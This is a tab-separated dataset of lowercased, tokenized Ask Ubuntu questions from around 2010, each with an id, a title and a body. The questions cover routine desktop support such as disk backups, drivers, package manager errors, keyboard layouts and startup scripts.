12858	ca n't boot after recovering backup	i installed xubuntu 10.10 on a 16 gb pendrive with full disk encryption using the alternate installer . the installation process was quite time consuming so i made a backup booting from the standard live cd with something along these lines dd if=/dev/sdb conv=noerror , sync | pv | gzip -c -9 > foobar.img.gz the pendrive booted fine for a couple of days and btw it was quite good performance-wise , but i decided to scrape it off and start from the backup , so i run gunzip -c foobar.img.gz | pv | dd of=/dev/sdb conv=sync , noerror now upon boot i am getting error : hd0 , msdos1 write error . after a while the login screen appears : unlocking the disk /dev/disk/by-uuid/58a8 ... ( sdb5_crypt ) enter passphrase : so i enter it , get the ok message cryptsetup : sdb5_crypt set up successfully only to get the following prompt no init found . try passing init= bootarg . busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) enter 'help ' for a list of buil-in commands . ( initramfs ) how to fix it ? is it possible to do backups of encrypted systems this way or do i have to use different tools for backup operating on the filesystem level for example ?
12866	login with my launchpad profile on ubuntu one is possible ?	does any one know if i can logon into ubuntu one using my launchpad.net profile ( openid ) ?
12867	how do i remove players i do n't use from the sound indicator ?	how to remove installed xnoise , rhytmbox on my sound indicator ? i am not using these 2 music player anymore i want to remove it
12870	alternative package manager for ubuntu terminal ?	i 'm looking for : alternative package management to be used from my gnome-terminal ( text-based method ) that can be a candidate to replace apt-get and aptitude . preferably one with detailed and easily read outputs , reduced command options ( like perform update before a search ) , and go fast enough . does any one know a alternative package manager ?
12872	weird color problem with movie players	both the built-in gnome movie player and vlc both have strange color distortions : human skin color changes to blue ; if it was pink it changes to green ; if it was yellow it changes to pink . the weird part is that when i watch clips in the browser the colors are right . has anyone encountered this ?
12875	how to make the escape key close the chat window in empathy ?	in pidgin we can select `` close conversations with the escape key '' in the preferences to close the chat window . is there anything similar in empathy ?
12879	how will the gnome2 notification area removal affect apps on ubuntu 11.04 ?	if i understood it correctly the plan is to remove the notification area from the gnome2 applet , blocking notifications from all apps except java and wine . how will this affect other applications ( e.g . skype ) which depend on the notification area interface ?
12886	image map in montage	i want to make thumbnails in an montage hyperlinked ( image map ) . is it possible to do it with image magic . for example when a montage is generated , the hyperlinks get embeded from a text file according to the thumbnail image file name . or is there a tool for ubuntu which can do it . edit 1 : there is an example here . if you hover your mouse over a person in the image , there is a hyperlink to an article about that person .
12891	metacity/compiz antialias ?	have ubuntu developers considered adding antialas to a window manager ( metacity ) in ubuntu 11.04 ? if there is coming unity and compiz is needed , why not to add this feature to corners of windows manager ?
12894	`` no required driver detected for unity '' on apple ibook g4	i know this question exactly looks like âno required driver detected for unityâ on dell mini 1010 , but like the title states , i 'm not using a dell mini 10 , but an apple ibook g4 . from what i understand of the associated question , it seems like a graphics device driver issue . so , where can i find such a driver ?
12897	how to remove mono ?	how do i remove mono from my ubuntu installation ? which applications depend on mono ? could you suggest me some alternatives ?
12900	intense hard drive access activity immediately after log in	i upgraded my ubuntu karmic to lucid a few months ago . i do n't know when it all started but the thing is that when i log in , i see a very intense disk access activity for a while that prevents any application from starting in a reasonable time ( it takes from 10 to 20 seconds ) . that 's why i can not launch a terminal window and top or iostat just in time to see what happens . when it prompts it 's too late . i tried to delimit the problem uninstalling zeitgeist , docky or whatever program i thought was behind that behaviour . i even deleted my private encrypted folder to avoid decryption issues . nothing changed . any idea about how to proceed ? thanks in advance .
12908	how to import ubottu factoids database to my irc supybot ?	i am using supybot . can anyone say me the procedure for adding ubottu factoids database to my irc bot ? i found the ubottu factoids database here http : //www.ubottu.com/factoids.cgi i want to add this database to my irc bot . can anyone tell me the procedure ?
12909	how do i upgrade to the development release ( aka . ubuntu+1 ) ?	how do i upgrade to the unreleased version of ubuntu for testing ?
12912	phillips saa7139 tv tuner card not working	when i had windows 7 installed on my computer , my tv tuner card used to work fine after installing the drivers but on ubuntu it is not working . i have tried several softwares to get it working but none helped . today i installed me tv and when i open it , i get an error saying `` there are no dvb devices available '' . what can i do to get my philips tv tuner card working . i have a pci card and here is the output of lspi command 04:00.0 multimedia controller : philips semiconductors saa7130 video broadcast decoder ( rev 01 )
12913	recommended configuration for parents	great linux desktop experiment i plan to give my family netbooks this year , and i would like some recommendations for how best to configure the machines for : linux newbies ( primarily windows users ) remote administration via ssh & to remote dynamic ips identical installs on 5 identical machines easy recovery ifwhen they break them recommended applications to install ( flash , etc ... ) copying settings/cookies/bookmarks from current machines to the netbooks , post install & setup my goal for them is to provide them with machines for web surfing , music listening , internet audio & video , im & video chat . my goal for me is to not have to support windows any longer . for # 1 i am wondering if there are specific editions ( of ubuntu or other distros ) recommended for windows users new to linux . should i install a theme that is windows ( os x ? ) like or would that make things worse since it wo n't be exactly like they are used to . maybe a clean break from the old is best to get them to try new things . for # 2 i am planning to setup ssh on the netbooks & administration accounts for myself so i can ssh from home and fix/install/update their machines . one requirement for this is that the netbooks should update a dynamic ip service with their current ip so i can find them no matter what network they are on ( if possible ) . # 3 , is it worth it to setup some sort of automated/mirrored install for 5 devices , or should i just power through separate installs . # 4 , should i setup some sort of kiosk mode so that with every reboot the system undoes any damage they have done and is back to a known good state ? how would i handle letting them save some changes , but not others ? # 6 , i plan to set them all up at my home , then take them to theirs . once there is there any way that i can plug up a usb cable to their current machines and copy things like bookmarks over to the new machines automatically ? any advice or suggestions welcome .
12914	how can i automatically have old e-mails deleted in evolution ?	there is a nice feature in thunderbird which lets you have your old e-mails , say those that are older than 30 days , deleted automatically . this feature ( or some workaround ) would be nice to have in evolution , too . is there anything like that in evolution or any plugin ? it would save disk space and a lot of loading time .
12917	how to send mail from the command line ?	how to send mail from the command line ?
12924	will uninstalling the byobu window manager break my gui ?	i 'm currently uninstalling redundant applications from my ubuntu 10.10 system and i came across the byobu window manager under the 'provided by canonical ' section . does this play any sort of critical role in window management , or is it simply a redundant application that 's been included to facilitate some niche operation ?
12937	remove nvidia driver and go back to nouveau	i 've installed nvidia driver successfully but i want to go back to nouveau driver and eliminate any xorg.conf file created by nvidia config tools . what is the proper way to do it ? ( not ending up with no driver at all , or no x server )
12942	disable cpu frequency scaling on lenovo laptop	i have a bug where my cpu frequency is scaling down every few hours or so . this happens when : i 'm on ac power scaling governor is on 'performance' what do you have to do to disable cpu frequency scaling ? i know you can manually force the min cpu frequency uder /sys/devices/system/cpu , however i really want a permanent solution so i do n't have to be constantly changing the cpufreq values .
12943	os drive and storage drive	well on my computer , i ca n't install ubuntu to my 750 and boot from it , but it does however , work from my 160 , and i use this as a work computer , and i have 280+ gb of information that i plan to put and use on it . so , it was suggested to me , after much frustration , to use the 160 , as the os drive , and the 750 as a storage drive . how do i get all of my files on that other harddrive and make it work as though it was all on one harddrive . the programs would know to go to whatever folders for whatever they need , such as banshee for music , etc . this is really ... odd , and i did n't expect this to happen , so how do i do this ?
12950	update manager : `` a problem occurred when checking for the updates ''	as of a few days ago i have this red circle with a horizontal white line through it persist on the panel in the top right . when i mouse over it , it says `` a problem occurred when checking for the updates '' . when there are updates to install , i can double click it and hit the 'install updates ' button . there is a brief progress bar , and then nothing happens . i can right click the red circle and click 'insall all updates ' , and then it says its `` marking '' the updates ă la synaptic package manager , and subsequently installs them . the circle wo n't go away and it 's just annoying . i 'm not sure how it would be related , but since this started , i hav n't been able to open ubuntu software centre . when i go applications > ubuntu software centre , my cursor just turns into the loading one for a few seconds , then nothing happens . any help is very appreciated . update : contents of /etc/apt/sources.list ( without comments ) : ? deb http : //au.archive.ubuntu.com/ubuntu/ maverick main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick main restricted deb http : //au.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb http : //au.archive.ubuntu.com/ubuntu/ maverick universe deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick universe deb http : //au.archive.ubuntu.com/ubuntu/ maverick-updates universe deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick-updates universe deb http : //au.archive.ubuntu.com/ubuntu/ maverick multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick multiverse deb http : //au.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb-src http : //au.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb http : //archive.canonical.com/ubuntu maverick partner deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted deb http : //security.ubuntu.com/ubuntu maverick-security universe deb-src http : //security.ubuntu.com/ubuntu maverick-security universe deb http : //security.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse deb http : //ppa.launchpad.net/wgrant/ppa/ubuntu maverick main deb-src http : //ppa.launchpad.net/wgrant/ppa/ubuntu maverick main update : contents of /var/log/apt/history.log : start-date : 2010-11-01 11:15:47 commandline : apt-get install gparted install : gparted : amd64 ( 0.6.2-1ubuntu1 ) end-date : 2010-11-01 11:16:04 start-date : 2010-11-01 23:46:57 install : realpath : amd64 ( 1.15build1 , automatic ) , clisp : amd64 ( 2.48-1.2 ) , libffcall1 : amd64 ( 1.10+cvs20100619-2 , automatic ) , libsigsegv0 : amd64 ( 2.5-3 , automatic ) , libdb4.7 : amd64 ( 4.7.25-9 , automatic ) , common-lisp-controller : amd64 ( 7.2 , automatic ) , cl-asdf : amd64 ( 1.704-1 , automatic ) end-date : 2010-11-01 23:47:18 start-date : 2010-11-01 23:47:53 install : gambc : amd64 ( 4.2.8-1.1 ) , libgambc4 : amd64 ( 4.2.8-1.1 , automatic ) , libgambc4-dev : amd64 ( 4.2.8-1.1 , automatic ) , gambc-doc : amd64 ( 4.2.8-1.1 , automatic ) end-date : 2010-11-01 23:48:02 start-date : 2010-11-03 12:14:21 upgrade : chromium-browser : amd64 ( 6.0.472.63~r59945-0ubuntu2 , 7.0.517.41~r62167-0ubuntu0.10.10.1 ) , gwibber-service : amd64 ( 2.32.0.1-0ubuntu1 , 2.32.0.2-0ubuntu1 ) , chromium-browser-inspector : amd64 ( 6.0.472.63~r59945-0ubuntu2 , 7.0.517.41~r62167-0ubuntu0.10.10.1 ) end-date : 2010-11-03 12:14:38 start-date : 2010-11-04 11:18:21 commandline : apt-get install flex install : m4 : amd64 ( 1.4.14-3 , automatic ) , flex : amd64 ( 2.5.35-9.1 ) end-date : 2010-11-04 11:18:29 start-date : 2010-11-04 11:18:39 commandline : apt-get install bison install : bison : amd64 ( 2.4.1.dfsg-3 ) end-date : 2010-11-04 11:18:43 start-date : 2010-11-05 10:07:42 upgrade : libpurple0 : amd64 ( 2.7.3-1ubuntu3 , 2.7.3-1ubuntu3.1 ) , libcupsppdc1 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libpurple-bin : amd64 ( 2.7.3-1ubuntu3 , 2.7.3-1ubuntu3.1 ) , libcupsimage2 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , gvfs-fuse : amd64 ( 1.6.4-0ubuntu1 , 1.6.4-0ubuntu1.1 ) , libcupscgi1 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libcupsdriver1 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , ubufox : amd64 ( 0.9~rc2-0ubuntu5 , 0.9~rc2-0ubuntu5.1 ) , gvfs-backends : amd64 ( 1.6.4-0ubuntu1 , 1.6.4-0ubuntu1.1 ) , libasound2-dev : amd64 ( 1.0.23-1ubuntu2 , 1.0.23-1ubuntu2.1 ) , cups-client : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libfreetype6 : amd64 ( 2.4.2-2 , 2.4.2-2ubuntu0.1 ) , cups-ppdc : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , lib32asound2 : amd64 ( 1.0.23-1ubuntu2 , 1.0.23-1ubuntu2.1 ) , simple-scan : amd64 ( 2.32.0-0ubuntu3 , 2.32.0-0ubuntu4 ) , python-aptdaemon : amd64 ( 0.31+bzr506-0ubuntu2 , 0.31+bzr506-0ubuntu4 ) , cups-common : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libcups2 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , alsa-utils : amd64 ( 1.0.23-2ubuntu3 , 1.0.23-2ubuntu3.4 ) , aptdaemon : amd64 ( 0.31+bzr506-0ubuntu2 , 0.31+bzr506-0ubuntu4 ) , cups : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libasound2 : amd64 ( 1.0.23-1ubuntu2 , 1.0.23-1ubuntu2.1 ) , flashplugin-installer : amd64 ( 10.1.85.3ubuntu1 , 10.1.102.64ubuntu0.10.10.1 ) , python-aptdaemon-gtk : amd64 ( 0.31+bzr506-0ubuntu2 , 0.31+bzr506-0ubuntu4 ) , libfreetype6-dev : amd64 ( 2.4.2-2 , 2.4.2-2ubuntu0.1 ) , xul-ext-ubufox : amd64 ( 0.9~rc2-0ubuntu5 , 0.9~rc2-0ubuntu5.1 ) , cups-bsd : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) , libgvfscommon0 : amd64 ( 1.6.4-0ubuntu1 , 1.6.4-0ubuntu1.1 ) , gvfs : amd64 ( 1.6.4-0ubuntu1 , 1.6.4-0ubuntu1.1 ) , libcupsmime1 : amd64 ( 1.4.4-6ubuntu2.1 , 1.4.4-6ubuntu2.2 ) end-date : 2010-11-05 10:08:58 start-date : 2010-11-05 20:55:33 commandline : apt-get install rdiff-backup install : python-pylibacl : amd64 ( 0.5.0-2 , automatic ) , rdiff-backup : amd64 ( 1.2.8-5ubuntu2 ) , librsync1 : amd64 ( 0.9.7-7 , automatic ) , python-pyxattr : amd64 ( 0.5.0-2 , automatic ) end-date : 2010-11-05 20:55:47 start-date : 2010-11-06 13:17:32 remove : libswscale0 : amd64 ( 0.6-2ubuntu6 ) , libavutil50 : amd64 ( 0.6-2ubuntu6 ) , gstreamer0.10-fluendo-mp3 : amd64 ( 0.10.14.debian-1 ) , libboost-date-time1.42.0 : amd64 ( 1.42.0-3ubuntu1 ) , libavcodec52 : amd64 ( 0.6-2ubuntu6 ) , gstreamer0.10-ffmpeg : amd64 ( 0.10.11-1 ) , gnash-common : amd64 ( 0.8.8-5ubuntu1 ) , libgtkglext1 : amd64 ( 1.2.0-1.1fakesync2 ) , libboost-thread1.42.0 : amd64 ( 1.42.0-3ubuntu1 ) , libpostproc51 : amd64 ( 0.6-2ubuntu6 ) , libavformat52 : amd64 ( 0.6-2ubuntu6 ) , gnash : amd64 ( 0.8.8-5ubuntu1 ) , libva1 : amd64 ( 1.0.1-3 ) , liboil0.3 : amd64 ( 0.3.16-1ubuntu2 ) end-date : 2010-11-06 13:17:49 start-date : 2010-11-06 13:20:00 remove : lib32bz2-1.0 : amd64 ( 1.0.5-4ubuntu1 ) , lib32ncurses5 : amd64 ( 5.7+20100626-0ubuntu1 ) , nspluginwrapper : amd64 ( 1.2.2-0ubuntu7 ) , ia32-libs : amd64 ( 20090808ubuntu9 ) , libc6-i386 : amd64 ( 2.12.1-0ubuntu8 ) , lib32gcc1 : amd64 ( 4.5.1-7ubuntu2 ) , lib32asound2 : amd64 ( 1.0.23-1ubuntu2.1 ) , flashplugin-installer : amd64 ( 10.1.102.64ubuntu0.10.10.1 ) , lib32z1 : amd64 ( 1.2.3.4.dfsg-3ubuntu1 ) , lib32stdc++6 : amd64 ( 4.5.1-7ubuntu2 ) , lib32v4l-0 : amd64 ( 0.6.4-1ubuntu1 ) end-date : 2010-11-06 13:20:09 start-date : 2010-11-08 15:46:39 install : libswscale0 : amd64 ( 0.6-2ubuntu6 , automatic ) , libavutil50 : amd64 ( 0.6-2ubuntu6 , automatic ) , libavcodec52 : amd64 ( 0.6-2ubuntu6 , automatic ) , gstreamer0.10-ffmpeg : amd64 ( 0.10.11-1 ) , libpostproc51 : amd64 ( 0.6-2ubuntu6 , automatic ) , libavformat52 : amd64 ( 0.6-2ubuntu6 , automatic ) , libva1 : amd64 ( 1.0.1-3 , automatic ) end-date : 2010-11-08 15:46:52 start-date : 2010-11-09 16:23:09 install : ubuntuone-client-gnome : amd64 ( 1.4.4.1-0ubuntu1 ) end-date : 2010-11-09 16:23:19 start-date : 2010-11-09 20:38:53 install : python2.7 : amd64 ( 2.7-6 ) , python2.7-minimal : amd64 ( 2.7-6 , automatic ) end-date : 2010-11-09 20:39:03 start-date : 2010-11-10 09:26:09 commandline : /usr/sbin/synaptic -- dist-upgrade-mode -- non-interactive -- hide-main-window -o synaptic : :askrelated=true upgrade : python-cupshelpers : amd64 ( 1.2.3+20100723-0ubuntu8 , 1.2.3+20100723-0ubuntu8.1 ) , sysvinit-utils : amd64 ( 2.87dsf-4ubuntu18 , 2.87dsf-4ubuntu19 ) , libsane-hpaio : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) , system-config-printer-gnome : amd64 ( 1.2.3+20100723-0ubuntu8 , 1.2.3+20100723-0ubuntu8.1 ) , hplip-cups : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) , hpijs : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) , hplip : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) , libhpmud0 : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) , gdb : amd64 ( 7.2-1ubuntu2 , 7.2-1ubuntu3 ) , system-config-printer-udev : amd64 ( 1.2.3+20100723-0ubuntu8 , 1.2.3+20100723-0ubuntu8.1 ) , system-config-printer-common : amd64 ( 1.2.3+20100723-0ubuntu8 , 1.2.3+20100723-0ubuntu8.1 ) , sysv-rc : amd64 ( 2.87dsf-4ubuntu18 , 2.87dsf-4ubuntu19 ) , initscripts : amd64 ( 2.87dsf-4ubuntu18 , 2.87dsf-4ubuntu19 ) , hplip-data : amd64 ( 3.10.6-1ubuntu10 , 3.10.6-1ubuntu10.1 ) end-date : 2010-11-10 09:26:52 start-date : 2010-11-10 18:39:25 commandline : /usr/sbin/synaptic -- dist-upgrade-mode -- non-interactive -- hide-main-window -o synaptic : :askrelated=true upgrade : chromium-browser : amd64 ( 7.0.517.41~r62167-0ubuntu0.10.10.1 , 7.0.517.44~r64615-0ubuntu0.10.10.1 ) , chromium-browser-inspector : amd64 ( 7.0.517.41~r62167-0ubuntu0.10.10.1 , 7.0.517.44~r64615-0ubuntu0.10.10.1 ) end-date : 2010-11-10 18:39:42 start-date : 2010-11-12 19:20:00 commandline : /usr/sbin/synaptic -- dist-upgrade-mode -- non-interactive -- hide-main-window -o synaptic : :askrelated=true upgrade : libxml2-utils : amd64 ( 2.7.7.dfsg-4 , 2.7.7.dfsg-4ubuntu0.1 ) , xserver-xorg-video-intel : amd64 ( 2.12.0-1ubuntu5 , 2.12.0-1ubuntu5.1 ) , libvpx0 : amd64 ( 0.9.2-1build1 , 0.9.2-1ubuntu0.1 ) , libxml2 : amd64 ( 2.7.7.dfsg-4 , 2.7.7.dfsg-4ubuntu0.1 ) , python-libxml2 : amd64 ( 2.7.7.dfsg-4 , 2.7.7.dfsg-4ubuntu0.1 ) end-date : 2010-11-12 19:20:14 start-date : 2010-11-13 13:22:38 commandline : apt-get install ssmtp install : ssmtp : amd64 ( 2.64-4fakesync1 ) end-date : 2010-11-13 13:22:45 start-date : 2010-11-13 13:40:07 commandline : apt-get install mutt install : mutt : amd64 ( 1.5.20-9ubuntu2 ) end-date : 2010-11-13 13:40:13
12952	sounds in thunar or xfce	i really like how smoothly xfce works and prefer it to gnome , so i would like to weigh it up a bit . ; ) is there a way to play sounds on certain system events ? the most useful that comes to my mind is after finishing copying , but maybe also on deleting a file or in other circumstances like there are sounds in mac os x or windows ?
12953	other devices in the battery power indicator ?	every now and then , i encounter some mention of other devices being shown in the power indicator . for example , along with the laptop battery , listing the battery level for an ipod being charged over usb . i understand the specification mentions that , too , but i definitely have n't seen it with any of my various devices that have batteries in them . so , does that feature truly exist right now ? any information on what hardware is supported and whether that support can expand in the future ? anything people can do to help ? : )
12954	use command line to run veetle linux application	could someone advise me what the complete command line is to run `` sh veetle-0.9.17-linux-install.sh '' . i 've opened command line and used command line hylton @ hylton-laptop : ~ $ run sh veetle-0.9.17-linux-install.sh ( not working ) and hylton @ hylton-laptop : ~ $ sh veetle-0.9.17-linux-install.sh ( not working ) . i guess i am using the command line . any help ?
12959	how to remove the nautilus overwrite prompt when copying files	i copy files a lot from one place to another . the dialog box that prompts me to confirm file overwrites slows me down a lot . i have tried to get rid of this but can not find where to configure this . anybody ?
12968	how can i use dyndns and send emails from it ?	how can i use dyndns with ubutntu and send emails from it ? i want create a free domain with dyndns.com ( mydomain.dyndns-at-home.com ) how can i link the domain with ubuntu ? how can i send emails from this domain ? ( info @ mydomain.dyndns-at-home.com )
12970	where was the discussion on making unity the default ?	obviously this is the kind of major decision that would require public feedback and a meeting of the technical board , but i ca n't seem to find the minutes from the meeting it was discussed . were there uds sessions ? a thread on the mailing list ? i admit i was n't paying as much attention as i could have , but i was a bit surprised when mark made the announcement at this developer summit . i got there halfway through the first day , and by that point most people were acting as though making netbook edition the default was a foregone conclusion , so i figure i must have missed something .
12978	recurring error in update manager - could not initialize the package manager	please refer to the attached screen-shot . this error comes every time i boot and now i am unable to get any updates . also , the ubuntu software center will no longer work . i click on the usc icon and nothing happens . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager' package and include the following error message : 'e : type 'sudo ' is not known on line 61 in source list /etc/apt/sources.list' i am using maverick meercat netbook . please advise how to resolve this problem . thanks for your help . edit - link to the sources.list file .
12979	computer wo n't shut down	my computer will not shut down . i press the shutdown button in the drop box and then it looks like its shutting down and the screen goes black but the computer itself does not stop working and the light does not turn off . here are the specs : ubuntu 10.04 ( lucid ) kernel : linux 2.6.32-23-generic gnome 2.30.2 memory : 495.7 mib processor : intel ( r ) pentium ( r ) 4 cpu 1.80ghz
12980	tools to check system startup speed	since maverick upgrade startup performances are not so good as previous versions . in particular after i log in desktop is really slow to become available to use . from grub to gdm everything is fine and fast as expected . how can i find out which elements slow down desktop loading ? i 've disabled all useless stuffs to me in startup applications , but still i can not obtain fair performances . any suggestion ?
12982	installed unity on my desktop pc and it is very laggy and annoying	i just installed ubuntu unity on my desktop pc and it is very lag and annoying ! any ideas ?
12988	what is the best 3d modeling and design program ?	hey i would love to get into 3d modeling and design and i was wondering if their were any alternatives to 3ds max and other such programs for ubuntu
12998	how to change the screen resolution for the gdm login screen ?	i use a login list with faces and the icons and text are tiny in gdm . is there an easy way to change the resolution of the login screen ? i 'm currently using 10.04 lucid .
12999	application to organize / manage installed networks	i was wondering if there is a application where you can organize networks . i mean if you have installed some networks you have to note every pc 's name , his ip-address and so on . is there a application where you can manage it ? i saw the monitoring tools but that is not exactly what i 'm looking for . maybe i didnt explain me well , after all my englis his not so good : ) for example if i install many different networks i write in a book how i configured them . i write pc-name ip-address ip-gateway ip-broadcast and so on for each network . it will be great if i can do it in a program to organize it well , and for example it gives me a node view of the network .
13000	keyboard function keys do not work	i use the microsoft natural multimedia keyboard 1.0a . the keyboard is not a wireless board . the escape button and the function keys have never worked . i am currently running on 10.10 . on previous incarnations the keys never worked either . however a recent journey through all the microsoft options in system > preference > keyboard > layouts suggested that the escape button could be functional . the current setting is generic 105-key ( intl ) pc . can i find out whether the keys can be made to work or not ? of the top buttons , nothing happens when i press my documents ; a small red cross appears at the top right of the screen when i press my pictures and the media , mail and web/home buttons work just fine . thanks , anthony .
13002	understanding the sensors applet	i just installed the package sensors-applet and i 'm having a hard time reading the outputs . it 's giving me 4 different temperature readings : the first two ( tz01 and temp1 ) always give exactly the same reading ( usually 50°c/122°f ) ; however , tz01 properties says that 60°c is a high value , while temp1 properties says that 90°c is a high value . i 'm assuming they 're both the cpu , but which one has the correct high value ? furthermore , i still do n't know what the other two are about . they always report similar ( but not identical ) temperature levels ( usually around 15-17°c/58-64°f ) . what are they ? i 'm running a single core laptop ( athlon neo ) with inboard graphics .
13006	how to rip cds in flac format using banshee ?	by default banshee rips cds in ogg vorbis format . i prefer to rip my cds in flac format . i ca n't find a setting anywhere to make banshee rip to flac . is this possible ? how do i do it ?
13007	is it possible to obtain an e-mail address like myname.surname @ ubuntu.com	being an ubuntu user for about 3 years , is it possible to obtain an e-mail address like myname.surname @ ubuntu.com ?
13013	problem when trying to install a service for running virtualbox vms headless	my goal is to have ubuntu start and stop a headless virtualbox vm gracefully when i start and stop my host machine ( ubuntu 10.04 ) . i 'm using a script provided by quadir kareemullah 's page . this is the lsb comment header from the script ( i eliminted vboxnet from `` required-start '' to reduce dependencies ) : # # # begin init info # provides : vboxsvc # required-start : $ local_fs $ remote_fs vboxdrv # required-stop : $ local_fs $ remote_fs # default-start : 2 3 4 5 # default-stop : s 0 1 6 # short-description : virtualbox service # description : virtualbox service to startup and shutdown virtual machines # # # end init info as explained by quadir i located the 'vboxsvc ' in /etc/init.d/ and executed : $ sudo update-rc.d vboxsvc this created the links for the runlevels . for example in the runlevel 2 : $ ls -l /etc/rc2.d/ ... lrwxrwxrwx 1 root root 17 2010-11-03 20:02 s20vboxdrv - > ../init.d/vboxdrv lrwxrwxrwx 1 root root 25 2010-11-03 20:03 s20vboxweb-service - > ../init.d/vboxweb-service lrwxrwxrwx 1 root root 17 2010-11-11 21:43 s21vboxsvc - > ../init.d/vboxsvc ... if i start|stop the service manually : $ sudo /etc/init.d/vboxsvx start it works as expected . the service does n't appear listed if i do `` service -- status-all '' , but it shows up when i use sysv-rc-conf -- list . it does n't start automatically when i boot the computer . on the other hand , the service stops automatically when i reboot or shutdown . for some reason when the system boots the link /etc/rc2.d/s21vboxnet is not being executed or something else is happening . i know that upstart is the way to do things now in ubuntu , but sysv init is still supported , right ? edit : i think i 'm close to solving the problem . i think that the solution has to do with having my home file system encrypted . when the init process is executing the corresponding startup scripts and tries to execute `` sudo -h -u myuser vboxmanage myvirtualmachine -type vrdp > /dev/null '' it does n't have access to myvirtualmachine 's data ( which is at an encrypted file system ) because i have n't logged in as myuser yet and , therefore , my home filesystem has n't been mounted .
13015	typing inverted question/exclamation marks	i type a lot in spanish and have a regular 105-key international keyboard . so i have no buttons for ñ or other accented letters . however , by setting the keyboard to `` us alternative international '' i can easily type many accented letters . just ' + e = é for instance . this is just like windows . however , there i was able to type : shift + 1 = ! shift + ctrl + 1 = ¡ shift + / = ? shift + ctrl + / = ¿ very convenient . but i have not been able to find a way to configure this in ubuntu . i have to go to some site that has these symbols , and then copy-paste . very inconvenient . anybody any idea ?
13020	mac keyboard keys	after my install on ubuntu maverick meerkat on my ibook , i have noticed that used keyboard layout is a pc one , and not mac one . let me explain it more clearly : as an example , mac keyboard defines a physical key for the - ( which sup character is _ ) . when pressing this key , the character appearing on screen is = , as this key is binded using a windows/linux physical keyboard . to terminate with that example , for displaying the - character , i have to press the key displaying the 6 number ( which on mac should normally print $ ) . if i take a look at my configuration , the keyboard properties says ( in its layout pane ) language `` other french '' keyboard type `` laptop mac '' what do i have to change to obtain the same key on screen than the one i have on keyboard ? update it 's an ibook g4 1.33 ghz ( m9846ll/a : ( retail $ 999 ) 1.33 ghz ; 12 in display ; 40 gb hard disk ; slot-load combo drive ( dvd-rom/cd-rw ) - thanks , wikipedia ) with a french localized keyboard . thanks
13021	what exactly is unity ?	i still do not understand about unity , please help me is it same with docky ?
13025	how to setup a local network over the cat5 cable ?	i use wifi to connect to the internet , and want to interconnect the two machines i am using so that it is easy to transfer files i can copy from one machine and use the same buffer on another machine as both the machines have lan ports vacant , i can connect the machines using a cat5 cable . one of the machines runs windows xp and the other one runs ubuntu 10.04 . which free software should i use ?
13026	is gnu emacs unicode compliant , or is it just multi-lingual aware via mule ?	i 've read that gnu emacs handles international scripts via a system called mule ( multi-lingual-environment ) . i also read ( somewhere , a while back ) that there was a move afoot ( in recent years ) to make it unicode compliant , and that this was being implemented in version 23 ( -ish ? ) . i typed some unicode text ( eg.कैसे ) into gedit , and successfully copied it into emacs . the copy-paste works in both directions . however , in emacs , using ctrl+shift+u to type a single unicode-codepoint does not work , nor is the ibus input method editor recognized by emacs . what is the state of play with emacs and unicode ? ... and is it possible to use the ibus ime with emacs ?
13027	how to setup thinkpad features on thinkpad t500	i have a ibm-lenovo thinkpad t500 . i was previously a exclusive windows user , but recently installed ubuntu and loving it because of speed and interface . the only thing is that i do n't get some features that i came to enjoy in windows . i need help setting these up : hard-drive protection - active protection software that pauses drive when there is movement my printer does n't work ( ca n't find the driver for this one ) : canon ip2600 a way to change which graphics chip to use while in os . i have both the integrated and non integrated ( dual-graphics ) . ( if not easy to setup , i know there 's a way to do it before it boots , but do n't know how ) . cpu performance level - in windows you can pick `` high performance '' , `` power saver '' , etc.. to save batteries . my integrated camera w/light - it works but need an app where i can record videos , take snapshots , etc . ca n't find one that works . thanks !
13029	monitoring inbound and outbound internet traffic	is there software i can install to enable me to monitor inbound and outbound internet traffic for security reasons ? i recently installed ubuntu and loving it because of speed and interface . i want to do what i can to make this the greatest os i 've ever worked with . can you provide suggestions as to what i should install or do ?
13030	how to recover ubuntu partition after computer failure ?	recently my computer broke down and the linux ubuntu 10.04 partition could not be loaded back . what should be done to recover it back ? what could be the possible error ?
